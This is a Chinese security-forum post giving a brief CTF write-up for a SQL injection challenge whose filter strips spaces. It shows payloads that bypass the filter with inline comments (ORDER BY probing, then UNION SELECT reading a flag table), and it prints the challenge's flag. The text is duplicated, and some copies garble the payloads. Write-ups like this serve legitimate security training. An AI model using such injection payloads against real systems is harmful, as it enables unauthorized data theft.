[原创]二十一丶你的空格哪去了 writeup

发表于: 2020-9-3 19:53 904

[原创]二十一丶你的空格哪去了 writeup

UzJu

2020-9-3 19:53

904

你的空格哪去了

简单的查询代码

输入1

输入2

提示hacker！

可能过滤的’ 或者 and等

没有提示hacker 说明没有过滤单引号

根据标题发现可能过滤了空格

尝试and后也没有过滤and

首先1’order//by//5#

发现没有信息

再尝试1’order//by//3#

然后使用-1’union//select//1,2,3#

然后看到我才会告诉你可以用select flag from flag看到Flag尝试payload:

-1'union//select//1,2,flag//from//flag#

Flag: flag{63564494cac7097c}
Blog：https://blog.catgames.cn
别问我为什么一下跳到二十一因为前面还没做完！！！！！！！！！！！！

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

最后于 2020-9-3 20:17 被UzJu编辑，原因：

收藏・0

免费・0

支持

最新回复 (1)
xuddk 雪币： 64 活跃值： (58) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 25 粉丝 0 关注私信	xuddk 2 楼有的人题目那么明显做不出来，而我不一样，我题目都没看到 2020-11-23 17:47 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

UzJu

发帖

405

回帖

580

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

专注于PC、移动、智能设备安全研究及逆向工程的开发者社区

最新回复 (1)
xuddk 雪币： 64 活跃值： (58) 能力值： ( LV2，RANK：10 ) 在线值：发帖 4 回帖 25 粉丝 0 关注私信	xuddk 2 楼有的人题目那么明显做不出来，而我不一样，我题目都没看到 2020-11-23 17:47 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[原创]二十一丶你的空格哪去了 writeup

你的空格哪去了

简单的查询代码

输入1

输入2

提示hacker！

可能过滤的’ 或者 and等

没有提示hacker 说明没有过滤单引号

根据标题发现可能过滤了空格

尝试and后也没有过滤and

首先1’order/**/by/**/5#

发现没有信息

再尝试1’order/**/by/**/3#

然后使用-1’union/**/select/**/1,2,3#

然后看到我才会告诉你可以用select flag from flag看到Flag尝试payload:

-1'union/**/select/**/1,2,flag/**/from/**/flag#

Flag: flag{63564494cac7097c}

Blog：https://blog.catgames.cn

别问我为什么一下跳到二十一 因为前面还没做完！！！！！！！！！！！！

首先1’order//by//5#

再尝试1’order//by//3#

然后使用-1’union//select//1,2,3#

-1'union//select//1,2,flag//from//flag#

别问我为什么一下跳到二十一因为前面还没做完！！！！！！！！！！！！